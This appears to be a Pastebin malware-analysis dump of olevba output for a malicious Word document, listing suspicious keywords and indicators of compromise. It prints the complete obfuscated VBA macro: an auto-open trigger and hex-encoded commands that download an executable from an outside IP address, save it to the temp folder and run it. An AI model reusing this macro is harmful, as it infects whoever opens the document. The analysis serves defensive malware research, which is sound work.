dynamoo

Malicious Word macro

Apr 7th, 2015
388
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIH-- vm1993lvw.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vm1993lvw.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. sdf
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Sub sdf()
  30. jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
  31. JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2837313e2934313e29333e2538313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
  32. GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
  33. sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
  34. Shell sdddd, 0
  35. End Sub
  36.  
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. ANALYSIS:
  39. +------------+----------------------+-----------------------------------------+
  40. | Type       | Keyword              | Description                             |
  41. +------------+----------------------+-----------------------------------------+
  42. | Suspicious | Shell                | May run an executable file or a system  |
  43. |            |                      | command                                 |
  44. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  45. |            |                      | strings                                 |
  46. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  47. |            |                      | Hex)                                    |
  48. | Suspicious | SaveToFile           | May create a text file (obfuscation:    |
  49. |            |                      | Hex)                                    |
  50. | Suspicious | Open                 | May open a file (obfuscation: Hex)      |
  51. | Suspicious | Shell                | May run an executable file or a system  |
  52. |            |                      | command (obfuscation: Hex)              |
  53. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  54. |            |                      | command (obfuscation: Hex)              |
  55. | Suspicious | Write                | May write to a file (if combined with   |
  56. |            |                      | Open) (obfuscation: Hex)                |
  57. | Suspicious | Shell.Application    | May run an application (if combined     |
  58. |            |                      | with CreateObject) (obfuscation: Hex)   |
  59. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  60. |            |                      | StrReverse+Hex)                         |
  61. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  62. |            |                      | StrReverse+Hex)                         |
  63. | Suspicious | Open                 | May open a file (obfuscation:           |
  64. |            |                      | StrReverse+Hex)                         |
  65. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  66. |            |                      | (obfuscation: StrReverse+Hex)           |
  67. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  68. |            |                      | be used to obfuscate strings (option    |
  69. |            |                      | --decode to see all)                    |
  70. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation: Hex) |
  71. | IOC        | dfsdfff.exe          | Executable file name (obfuscation: Hex) |
  72. | IOC        | cscript.exe          | Executable file name (obfuscation: Hex) |
  73. | IOC        | http://185.39.149.17 | URL (obfuscation: StrReverse+Hex)       |
  74. |            | 8/aszxmy/image04.gif |                                         |
  75. | IOC        | 185.39.149.178       | IPv4 address (obfuscation:              |
  76. |            |                      | StrReverse+Hex)                         |
  77. | IOC        | cmd.exe              | Executable file name (obfuscation:      |
  78. |            |                      | StrReverse+Hex)                         |
  79. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation:      |
  80. |            |                      | StrReverse+Hex)                         |
  81. +------------+----------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Module2.bas
  84. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module2'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
  87. Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
  88. JvigRuKAuHzAIK17 = 2912
  89. For CqINRagdDXnLii12 = 0 To 65
  90. JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
  91. DoEvents
  92. Next CqINRagdDXnLii12
  93.  
  94. For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
  95. UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
  96. ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
  97. Next TQmHIRcQAPjC
  98. HJbjbkljgIUGI = ePUuigaspLiGL
  99. End Function
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101. ANALYSIS:
  102. +------------+---------+-----------------------------------------+
  103. | Type       | Keyword | Description                             |
  104. +------------+---------+-----------------------------------------+
  105. | Suspicious | Chr     | May attempt to obfuscate specific       |
  106. |            |         | strings                                 |
  107. +------------+---------+-----------------------------------------+
RAW Paste Data